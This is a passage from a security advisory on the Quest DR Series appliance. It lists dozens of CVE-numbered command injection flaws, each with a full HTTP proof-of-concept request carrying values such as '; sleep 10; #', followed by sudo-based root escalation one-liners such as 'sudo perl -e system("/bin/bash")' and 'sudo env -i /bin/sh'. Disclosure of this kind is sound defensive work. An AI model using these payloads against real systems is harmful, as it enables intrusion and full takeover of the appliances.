the 'storage_group' system binary without sanitization, \nwhich allows an attacker to inject system commands via the 'name' parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 107 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DRStorageGroup\", \n\"name\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.20. *Command injection in the update storage group method* \n \n[CVE-2018-11162] \nSeveral request parameters are taken from the 'newGroup' dictionary when \nupdating a storage group and used as components of a command string without \nany sanitization taking place. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 159 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"update\", \n\"params\": { \n\"classname\": \"DRStorageGroup\", \n\"newGroup\": { \n\"Name\": \"; sleep 10; #\", \n\"Compression_mode\": \"pepecomprimido\" \n} \n}, \n\"id\": 1 \n} \n-----/ \n \n7.21. *Command injection in the set contact information method* \n \n[CVE-2018-11163] \nThe GUI provides functionality to set the administrator contact information. \nThe 'relay_host' parameter is used as provided in the construction of a \ncommand line string, therefore allowing attackers to inject system commands. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 143 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set\", \n\"params\": { \n\"classname\": \"DRContactInformation\", \n\"action\": \"email_alerts\", \n\"relay_host\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.22. *Command injection in the generate diagnostics method* \n \n[CVE-2018-11164] \nThe diagnostics page allows users to generate diagnostic logs that capture \nthe state of the system. An attacker authenticated within the web \napplication \ncan inject arbitrary system commands by crafting the value of the 'type' \nrequest parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 108 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"generate\", \n\"params\": { \n\"classname\": \"DRDiagnostics\", \n\"type\": \"; sleep 15; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.23. *Command injection in the delete diagnostics method* \n \n[CVE-2018-11165] \nThe 'delete' diagnostics functionality was found to be vulnerable to command \ninjection via the 'file_name' parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 111 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DRDiagnostics\", \n\"file_name\": \"; sleep 15; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n \n7.24. *Command injection in the rescan_replica_VTL_container method* \n \n[CVE-2018-11166] \nThe subroutine in charge of rescanning a VTL container replica was found to \nbe vulnerable to command injection via the container name parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 133 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"rescan_replica_VTL_container\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"cname\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.25. *Command injection in the activate_replica_VTL_container method* \n \n[CVE-2018-11167] \nThe subroutine in charge of activating a VTL container was found to be \nvulnerable to command injection via the container name parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 136 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"activate_replica_VTL_container\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"cname\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.26. *Command injection in the deactivate_replica_VTL_container method* \n \n[CVE-2018-11168] \nThe subroutine in charge of deactivating a VTL container was also found to \nbe vulnerable to command injection via the container name parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5 \nContent-Length: 138 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"deactivate_replica_VTL_container\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"cname\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.27. *Command injection in the start replication method* \n \n[CVE-2018-11169] \nThe 'start' replication subroutine implements the logic to perform a \nreplication in an existing storage replication relationship. Arbitrary \ncommand execution can be achieved via the 'name' parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 107 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"start\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"name\": \"'; sleep 15; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.28. *Command injection in the stop replication method* \n \n[CVE-2018-11170] \nThe 'stop' replication functionality was also found to be vulnerable to \ncommand injection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 106 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"stop\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"name\": \"'; sleep 15; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.29. *Command injection in the delete replication method* \n \n[CVE-2018-11171] \nDeleting a replicaton is yet another way in which authenticated attackers \ncould abuse the 'ReplicationsService' module in order to execute system \ncommands in the context of the web application. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 106 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DRReplications\", \n\"name\": \"'; sleep 15; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.30. *Command injection in the set hostname method* \n \n[CVE-2018-11172] \nThe system hostname can be updated via the 'HostnameService' exposed \nfunctionality. Request parameters are not sanitized. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 104 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set\", \n\"params\": { \n\"classname\": \"DRHostname\", \n\"hostname\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.31. *Command injection in the add email alert method* \n \n[CVE-2018-11173] \nAttackers can inject system commands by requesting to add an email alert and \nproviding a malicious email address containing the payload. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 112 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"add\", \n\"params\": { \n\"classname\": \"DREmailAlerts\", \n\"emailAddress\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.32. *Command injection in the delete email alert method* \n \n[CVE-2018-11174] \nAnalogous to the email alert 'add' subroutine, the 'delete' email alert \ncounterpart is also vulnerable to command injection because of an \nunsanitized \nemail address parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 115 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"delete\", \n\"params\": { \n\"classname\": \"DREmailAlerts\", \n\"emailAddress\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.33. *Command injection in the setBandwidthLimit method* \n \n[CVE-2018-11175] \nThe DR series appliance can be configured to enforce different limits over \nthe network traffic. This functionality is handled by the \n'NetworkInterfacesServices' module and its 'setBandwidthLimit' subroutine \nwas found to be vulnerable to command injection. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 154 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"setBandwidthLimit\", \n\"params\": { \n\"classname\": \"DRNetworkInterface\", \n\"bandwidthUnit\": \"default\", \n\"targetIp\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.34. *Command injection in the set_passphrase method* \n \n[CVE-2018-11176] \nA DR series system can be configured to use encryption at rest. The method \nthat sets the passphrase can be abused by attackers to execute arbitrary \nsystem commands. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 119 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set_passphrase\", \n\"params\": { \n\"classname\": \"DREncryption\", \n\"passphrase\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.35. *Command injection in the set_encryption_settings method* \n \n[CVE-2018-11177] \nDifferent encryption settings can be configured, such as the encryption mode \nand the key rotation interval. These parameters are taken from the user \ngenerated request and used as components of a command string, therefore \nallowing attackers to inject arbitrary system commands. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 128 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set_encryption_settings\", \n\"params\": { \n\"classname\": \"DREncryption\", \n\"encryption\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.36. *Command injection in the start_filesystem method* \n \n[CVE-2018-11178] \nSeveral features implemented in the 'StartupPassphraseService' module were \nfound to be vulnerable to command injection. In particular, the \n'start_filesystem' \nsubroutine takes a user supplied passphrase to construct a system command. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 129 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"start_filesystem\", \n\"params\": { \n\"classname\": \"DRStartupPassphrase\", \n\"passphrase\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.37. *Command injection in the save_configuration method* \n \n[CVE-2018-11179] \nSaving startup configuration was also found to be prone to command injection \nissues. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 151 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"save_configuration\", \n\"params\": { \n\"classname\": \"DRStartupPassphrase\", \n\"status\": \"pepito\", \n\"passphrase\": \"'; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.38. *Command injection in the cloud portal register method* \n \n[CVE-2018-11180] \nThe 'CloudPortal' module allows to register an agent with the cloud portal \nsystem. Its 'register' subroutine was found to be vulnerable to command \ninjection via the 'registrationCode' request parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 120 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"register\", \n\"params\": { \n\"classname\": \"DRCloudPortal\", \n\"registrationCode\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.39. *Command injection in the customer portal register method* \n \n[CVE-2018-11181] \nThe subroutine in charge of registering the DR series appliance with the \nQuest Customer Portal could be abused by an authenticated attacker to \nexecute system commands via a specially crafted 'token' request parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 112 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"register\", \n\"params\": { \n\"classname\": \"DRCustomerPortal\", \n\"token\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.40. *Command injection in the customer portal changeManageBtn method* \n \n[CVE-2018-11182] \nCustomer portal integration supports changing the manage button action. \nThis functionality was found to be vulnerable via the 'action' parameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 120 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"changeManageBtn\", \n\"params\": { \n\"classname\": \"DRCustomerPortal\", \n\"action\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.41. *Command injection in the set DNS method* \n \n[CVE-2018-11183] \nThe 'set' subroutine in the 'DnsService' module allows users to configure \nthe DNS servers used. When setting new DNS server configuration, several \nuser supplied parameters are used to build a command line string without \napplying any sanitization, therefore leading to command injection. \n \n \nProof of concept: \n \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 101 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"set\", \n\"params\": { \n\"classname\": \"DRDns\", \n\"dns_suffix\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n \n7.42. *Command injection in the get usage method* \n \n[CVE-2018-11184] \nThe 'UsageService' module allows administrators to monitor system usage. \nA single subroutine processes the user's query and returns the corresponding \nstatistics. \n \nThe following proof of concept exploits the 'usage' type. \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 114 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"get\", \n\"params\": { \n\"classname\": \"DRUsage\", \n\"type\": \"usage\", \n\"width\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.43. *Command injection in the support portal register method* \n \n[CVE-2018-11185] \nDR series systems can be registered with the Quest Support Portal. \nRegistered \nsystems collect certain information such as operational statistics, \nperformance \nmetrics, diagnostic information and configuration settings, which are then \ntransmitted to Quest in order to help troubleshoot system problems. \n \nThe subroutine implementing the registration functionality with the Support \nPortal was found to be vulnerable to command injection via the 'email' \nparameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 111 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"register\", \n\"params\": { \n\"classname\": \"DRSupportPortal\", \n\"email\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.44. *Command injection in the setDateAndTime method* \n \n[CVE-2018-11186] \nAttackers can execute arbitrary system commands by configuring a custom \ntimezone. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 115 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"setDateAndTime\", \n\"params\": { \n\"classname\": \"DRDateTime\", \n\"timezone\": \"; sleep 10; #\" \n}, \n\"id\": 1 \n} \n \n-----/ \n \n \n7.45. *Command injection in the global view add_member method* \n \n[CVE-2018-11187] \nGlobalView is a dashboard view providing a global picture of all the DR \nSeries systems in an organization. The functionality to add a new system \nwas found to be vulnerable to command injection via the 'RemoteHost' \nparameter. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 165 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"add_member\", \n\"params\": { \n\"classname\": \"DRGlobalView\", \n\"UserName\": \"pepito\", \n\"Password\": \"pepito123\", \n\"RemoteHost\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.46. *Command injection in the global view reconnect_member method* \n \n[CVE-2018-11188] \nReconnecting a disconnected system in the Global View page can also result \nin arbitrary command execution. \n \nProof of concept: \n \n/----- \nPOST /ws/v1.0/jsonrpc HTTP/1.1 \nHost: 192.168.1.39 \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) \nGecko/20100101 Firefox/57.0 \nAccept: application/json, text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://192.168.1.39/ \nContent-Type: application/json-rpc \nSessionCookie: e2de614014605fc5115fd72076aa827e \nContent-Length: 171 \nConnection: close \n \n{ \n\"jsonrpc\": \"2.0\", \n\"method\": \"reconnect_member\", \n\"params\": { \n\"classname\": \"DRGlobalView\", \n\"UserName\": \"pepito\", \n\"Password\": \"pepito123\", \n\"RemoteHost\": \"; sleep 10; echo \" \n}, \n\"id\": 1 \n} \n-----/ \n \n7.47. *Privilege escalation from web server user to root via perl* \n \n[CVE-2018-11189] \nThe web server is running as the webadmin user. Exploiting any of the \ncommand injection vulnerabilities oulined in the previous sections would \nthen result in 'webadmin' level access. \n \nThe webadmin user has sudo access to run the perl interpreter as root, \npresumably to operate the various scripts that are called from the web \napplication. However, this means that an attacker who manages to execute \ncode in the context of the web server can easily escalate user privileges \nto root by running arbitrary code via the perl interpreter. \n \n/----- \nsh-3.2$ id \nuid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) \nsh-3.2$ sudo perl -e 'system(\"/bin/bash\")' \n \nid \nuid=0(root) gid=0(root) \ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n \n-----/ \n \n7.48. *Privilege escalation from web server user to root via env* \n \n[CVE-2018-11190] \nThe webadmin user has sudo access to run the /bin/env binary with root \npermissions, resulting in direct privilege escalation. \n \n/----- \nwebadmin@dr2k-1thv-dsmoke-01 > sudo env -i /bin/sh \nsh-3.2# id \nuid=0(root) gid=0(root) \ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n-----/ \n \n7.49. *Privilege escalation from web server user to root via local scripts* \n \n[CVE-2018-11191] \nThe webadmin user is allowed to run local configuration scripts located in \n/usr/local/bin with root level permissions and without requiring a password. \nIn particular, there is an 'exec.sh' shell script that allows users to \nexecute \narbitrary commands. Because it can be run via sudo, this results once again \nin privilege escalation to root. \n \n/----- \nwebadmin@dr2k-1thv-dsmoke-01 > id \nuid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) \nwebadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/exec.sh /bin/bash \n \nNOTICE: To capture 'service' session output please use 'capture' command. \nType 'exit' to stop the capture. \n \nTotal alert messages : 0 \n \nservice@dr2k-1thv-dsmoke-01 > id \nuid=0(root) gid=0(root) \ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n-----/ \n \n7.50. *Privilege escalation from web server user to root via strace* \n \n[CVE-2018-11192] \nThe strace binary can be run by the webadmin user with root privileges. \nIn reality, this means that arbitrary processes are run as root, opening \nanother vector to escalate privileges once the web server is compromised. \n \n/----- \nwebadmin@dr2k-1thv-dsmoke-01 > id \nuid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin) \nwebadmin@dr2k-1thv-dsmoke-01 > sudo strace /usr/bin/id \n[...] \nread(3, \"root:x:0:root,admin,administrato\"..., 4096) = 731 \nclose(3) = 0 \nmunmap(0x2ba34633d000, 4096) = 0 \nwrite(1, \"uid=0(root) gid=0(root) groups=0\"..., 88uid=0(root) \ngid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) \n) = 88 \nclose(1) = 0 \nmunmap(0x2ba34633c000, 4096) = 0 \nexit_group(0) = ? \n-----/ \n \n7.51. *Privilege escalation from web server user to root via ocashell* \n \n[CVE-2018-11193] \nThe ocashell script located in the /usr/local/bin directory spawns a bash \nshell and can be executed by the webadmin user via sudo. This results in a \ncommand line shell with root privileges. \n \n/----- \nwebadmin@dr2k-1thv-dsmoke-01 > sudo /usr/local/bin/ocashell \n \nNOTICE: To capture 'service' session output please use 'capture' command. \nType 'exit' to stop the capture. \n \nTotal alert messages : 0 \n \nservice@dr2k-1thv-dsmoke-01 > id \nuid=0(root) gid=0(root) 